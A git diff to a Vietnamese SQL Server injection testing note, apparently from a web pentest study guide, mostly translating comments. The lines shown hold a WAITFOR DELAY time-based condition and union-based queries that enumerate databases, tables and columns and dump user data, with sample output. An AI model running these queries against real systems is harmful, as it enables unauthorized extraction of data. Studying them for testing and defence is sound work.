--- a/Web_testing/0.7.Input_Validation_Testing/5.Testing_for_SQL_Injection/5.3.Testing_for_SQL_Server.md
+++ b/Web_testing/0.7.Input_Validation_Testing/5.Testing_for_SQL_Injection/5.3.Testing_for_SQL_Server.md
@@ -2,7 +2,7 @@
 
 - SQL Server hoạt động tốt với .NET
 - SQL server sử dụng một storage engine được phát triển bởi Microsoft
-- Cho phép hủy quẻy giữa chừng
+- Cho phép hủy query giữa chừng
 - SQL Server chủ yếu hỗ trợ Windows, với các tùy chọn triển khai đám mây cho Linux và macOS thông qua Docker.
 
 # String concatenation
@@ -64,24 +64,25 @@ IF (YOUR-CONDITION-HERE) WAITFOR DELAY '0:0:10
 # MSSQL Union Based
 
 ```sql
--- extract databases names
+-- lấy tên database
 $ SELECT name FROM master..sysdatabases -- `..` dùng để chỉ đối tượng trong 1 cơ sở dữ liệu cụ thể
 [*] Injection
 [*] msdb
 [*] tempdb
 
--- extract tables from Injection database
+-- lấy bảng có trong database Injection 
 $ SELECT name FROM Injection..sysobjects WHERE xtype = 'U' -- `U` đại diện cho bảng user
 [*] Profiles
 [*] Roles
 [*] Users
  
--- extract columns for the table Users
+-- lấy cột có trong bảng Users
 $ SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'Users')
 [*] UserId
 [*] UserName
 -- tìm id của bảng `Users` trong `sysobjects`, sau đó tìm tất cả cột có trong bảng `Users` từ `syscolumns`
--- Finally extract the data
+
+-- láy thông tin
 $ SELECT  UserId, UserName from Users
 ```
 
